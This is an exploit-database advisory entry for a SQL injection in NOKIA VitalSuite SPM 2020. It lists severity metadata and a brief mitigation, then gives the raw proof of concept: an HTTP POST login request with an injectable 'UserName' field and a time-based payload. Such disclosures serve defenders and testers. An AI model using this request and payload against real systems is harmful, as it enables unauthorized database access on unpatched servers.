NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection

vendor:

VitalSuite SPM

by:

Berk Dusunur

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: VitalSuite SPM

Affected Version From: v2020

Affected Version To: v2020

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: MacosX

2020

NOKIA VitalSuite SPM 2020 – ‘UserName’ SQL Injection

A SQL injection vulnerability exists in NOKIA VitalSuite SPM 2020, which allows an attacker to inject malicious SQL queries via the 'UserName' parameter. An example time-based payload is 'UserName=test'; waitfor delay '00:00:10' --'

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

# Exploit Title: NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection
# Exploit Author: Berk Dusunur
# Google Dork: N/A
# Type: Web App
# Date: 2020-05-28
# Vendor Homepage: https://www.nokia.com
# Software Link: https://www.nokia.com/networks/products/vitalsuite-performance-management-software/
# Affected Version: v2020
# Tested on: MacosX
# CVE : N/A


# PoC


POST /cgi-bin/vsloginadmin.exe HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Accept: /
Accept-Encoding: gzip,deflate
Content-Length: 84
Host: berklocal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML,
like Gecko) Chrome/41.0.2228.0 Safari/537.21

Password=test&Submit=%20Login%20&UserName=SQL-INJECTION&mode=1

Example Time-Based payload

UserName=test'; waitfor delay '00:00:10' --